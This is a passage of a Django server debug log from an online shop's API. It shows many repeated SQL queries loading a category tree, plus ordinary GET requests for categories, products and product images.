"shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 09:32:45,622 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 09:32:45,625 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 09:32:45,628 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 09:32:45,631 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 09:32:45,636 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 09:32:45,638 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 09:32:45,641 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 09:32:45,644 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 09:32:45,647 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 09:32:45,650 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 09:32:45,654 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 09:32:45,657 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 09:32:45,660 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 09:32:45,663 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 09:32:45,666 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 09:32:45] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 09:32:54,032 utils 4252 140031482124032 (0.002) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."id" = 10; args=(10,) DEBUG 2019-12-19 09:32:54,038 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) [19/Dec/2019 09:32:54] "GET /api/v1/categories/10 HTTP/1.0" 200 353 DEBUG 2019-12-19 09:32:54,304 utils 4252 140031482124032 (0.003) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=() DEBUG 2019-12-19 09:32:54,312 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 10 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(10,) DEBUG 2019-12-19 09:32:54,317 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 46 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(46,) DEBUG 2019-12-19 09:32:54,319 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 6 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(6,) DEBUG 2019-12-19 09:32:54,322 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 14 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(14,) DEBUG 2019-12-19 09:32:54,325 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 13 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(13,) DEBUG 2019-12-19 09:32:54,327 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 12 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(12,) DEBUG 2019-12-19 09:32:54,330 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 15 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(15,) DEBUG 2019-12-19 09:32:54,333 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 1 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(1,) DEBUG 2019-12-19 09:32:54,336 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 20 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(20,) DEBUG 2019-12-19 09:32:54,339 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 18 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(18,) DEBUG 2019-12-19 09:32:54,341 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 21 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(21,) DEBUG 2019-12-19 09:32:54,343 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 19 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(19,) DEBUG 2019-12-19 09:32:54,346 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 3 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(3,) DEBUG 2019-12-19 09:32:54,349 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 22 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(22,) DEBUG 2019-12-19 09:32:54,352 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 23 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(23,) DEBUG 2019-12-19 09:32:54,354 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 24 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(24,) DEBUG 2019-12-19 09:32:54,356 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 25 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(25,) DEBUG 2019-12-19 09:32:54,359 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 7 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(7,) DEBUG 2019-12-19 09:32:54,363 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 37 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(37,) DEBUG 2019-12-19 09:32:54,365 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 39 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(39,) DEBUG 2019-12-19 09:32:54,367 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 38 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(38,) DEBUG 2019-12-19 09:32:54,370 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 36 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(36,) DEBUG 2019-12-19 09:32:54,372 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 35 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(35,) DEBUG 2019-12-19 09:32:54,375 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 4 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(4,) DEBUG 2019-12-19 09:32:54,378 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 26 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(26,) DEBUG 2019-12-19 09:32:54,381 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 29 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(29,) DEBUG 2019-12-19 09:32:54,383 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 28 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(28,) DEBUG 2019-12-19 09:32:54,385 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 27 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(27,) DEBUG 2019-12-19 09:32:54,388 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 8 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(8,) DEBUG 2019-12-19 09:32:54,391 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 43 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(43,) DEBUG 2019-12-19 09:32:54,393 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 42 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(42,) DEBUG 2019-12-19 09:32:54,396 utils 4252 140031482124032 (0.001) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 41 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(41,) DEBUG 2019-12-19 09:32:54,399 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 40 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(40,) DEBUG 2019-12-19 09:32:54,401 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 5 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(5,) DEBUG 2019-12-19 09:32:54,405 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 34 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(34,) DEBUG 2019-12-19 09:32:54,407 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 33 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(33,) DEBUG 2019-12-19 09:32:54,409 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 32 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(32,) DEBUG 2019-12-19 09:32:54,412 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 31 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(31,) DEBUG 2019-12-19 09:32:54,414 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 30 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(30,) DEBUG 2019-12-19 09:32:54,416 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 11 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(11,) DEBUG 2019-12-19 09:32:54,419 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 17 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(17,) DEBUG 2019-12-19 09:32:54,421 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 16 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(16,) DEBUG 2019-12-19 09:32:54,424 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 9 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(9,) DEBUG 2019-12-19 09:32:54,426 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 44 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(44,) DEBUG 2019-12-19 09:32:54,428 utils 4252 140031482124032 (0.000) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."parent_id" = 45 ORDER BY "shop_category"."tree_id" ASC, "shop_category"."lft" ASC; args=(45,) [19/Dec/2019 09:32:54] "GET /api/v1/categories/ HTTP/1.0" 200 15396 DEBUG 2019-12-19 09:33:06,544 utils 4252 140031482124032 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'fire'; args=('fire',) DEBUG 2019-12-19 09:33:06,551 utils 4252 140031482124032 (0.003) SELECT "shop_product"."id", "shop_product"."category_id", "shop_product"."name", "shop_product"."slug", "shop_product"."image", "shop_product"."video", "shop_product"."description", "shop_product"."price", "shop_product"."stock", "shop_product"."available", "shop_product"."created", "shop_product"."updated" FROM "shop_product" WHERE ("shop_product"."available" = true AND "shop_product"."category_id" = 1) ORDER BY "shop_product"."name" ASC; args=(True, 1) [19/Dec/2019 09:33:06] "GET /api/v1/fire/ HTTP/1.0" 200 482 [19/Dec/2019 09:33:07] "GET /media/products/2019/12/05/SampleGIFImage_350kbmb_vsJs0Zd.gif HTTP/1.0" 200 355854 [19/Dec/2019 09:33:07] "GET /media/products/2019/12/06/monika-grabkowska-zE6fKdd9QLI-unsplash.jpg HTTP/1.0" 200 3039441 [19/Dec/2019 09:33:07] "GET /media/products/2019/12/06/nathan-dumlao-9m6XwFTWGKs-unsplash.jpg HTTP/1.0" 200 3337046 [19/Dec/2019 09:37:41] "GET / HTTP/1.0" 302 0 [19/Dec/2019 09:40:10] "GET / HTTP/1.0" 302 0 DEBUG 2019-12-19 09:40:10,528 utils 